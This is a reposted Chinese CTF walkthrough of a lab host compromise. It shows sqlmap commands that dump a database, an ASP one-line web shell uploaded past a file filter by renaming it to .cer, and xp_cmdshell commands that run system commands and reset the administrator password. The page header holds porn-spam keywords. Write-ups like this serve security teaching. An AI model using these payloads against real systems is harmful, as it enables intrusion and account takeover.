日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

0x00 介紹

接著上一篇《CTF之主機滲透系列二》,咱們繼續。還是那句話,任何工具使用均來自互聯網,涉及到的技術僅用于教學,不得用于非法用途,請遵守國家安全法律法規,做一個正能量的安全人員。

試題如下:

CTF之主機滲透系列三

 

第一步:我們訪問鏈接:http://202.0.0.23/

CTF之主機滲透系列三

 

進入網頁首頁,通過瀏覽觀察,找到http://202.0.0.23/NewsList.asp?SortID=17 新聞資訊頁面,通過get方法提交的參數名為SortID,值為1,我們嘗試一下是否存在sql注入,通過sqlmap去跑一下

CTF之主機滲透系列三

 


CTF之主機滲透系列三

 

發現存在sql注入漏洞sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 –dbs

CTF之主機滲透系列三

 

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS –tables

CTF之主機滲透系列三

 

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS -T eims_flag –dump

CTF之主機滲透系列三

 

查看賬號密碼的數據庫表

CTF之主機滲透系列三

 

對b2076528346216b3進行md5解密,解密得密碼為admin1234賬號為root

第二步:接下來使用御劍后臺掃描,找到后臺登錄頁面

CTF之主機滲透系列三

 


CTF之主機滲透系列三

 

右鍵此頁面查看源碼,找到一個flag:<!--flag2{890b0c4958ef57e9264a9d2703ea7e8c}-->

CTF之主機滲透系列三

 

第三步:使用賬戶root密碼admin1234登錄后臺,在后臺系統信息-文件上傳處上傳后綴為.asp的asp一句話木馬,一句話木馬內容:<%eval request("caidao")%> (按照asp一句話木馬格式)

CTF之主機滲透系列三

 

結果提示上傳文件格式不對,想下繞過辦法

CTF之主機滲透系列三

 

這里我們將一句話木馬文件改一個可執行的后綴.cer

CTF之主機滲透系列三

 

則上傳成功第四步:下面我們直接上菜刀工具了

CTF之主機滲透系列三

 

在網站根目錄發現flag文件flag3{23c5b149510105853f5e7ef9a6f06627}

CTF之主機滲透系列三

 

在數據庫配置文件中找到數據庫的賬號密碼

CTF之主機滲透系列三

 

使用一句話木馬連接mssql數據庫

CTF之主機滲透系列三

 

利用mssql數據庫的xpcmdshell組件執行系統命令 EXEC master..xp_cmdshell 'whoami'

CTF之主機滲透系列三

 

當前cmdshell的權限是system權限,所以直接修改administrator的密碼為hacker:EXEC master..xp_cmdshell 'net user administrator 123456'

CTF之主機滲透系列三

 

第五步:直接遠程桌面連接服務器administrator/123456,在桌面發現flag文件,flag5{47baf6d9d60f40c8b1dafa56c62fcd06}

CTF之主機滲透系列三

 


CTF之主機滲透系列三

 

在c盤發現另外一個flag文件 flag4{e35a01e91e1833d266f95881ae83b4ca}

CTF之主機滲透系列三

 

至此,5個flag就找出來了,未完待續?。。?/p>

更多信安干貨文章,請持續關注專欄

知了堂禁衛實驗室?zhuanlan.zhihu.com

分享到:
標簽:滲透 主機
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定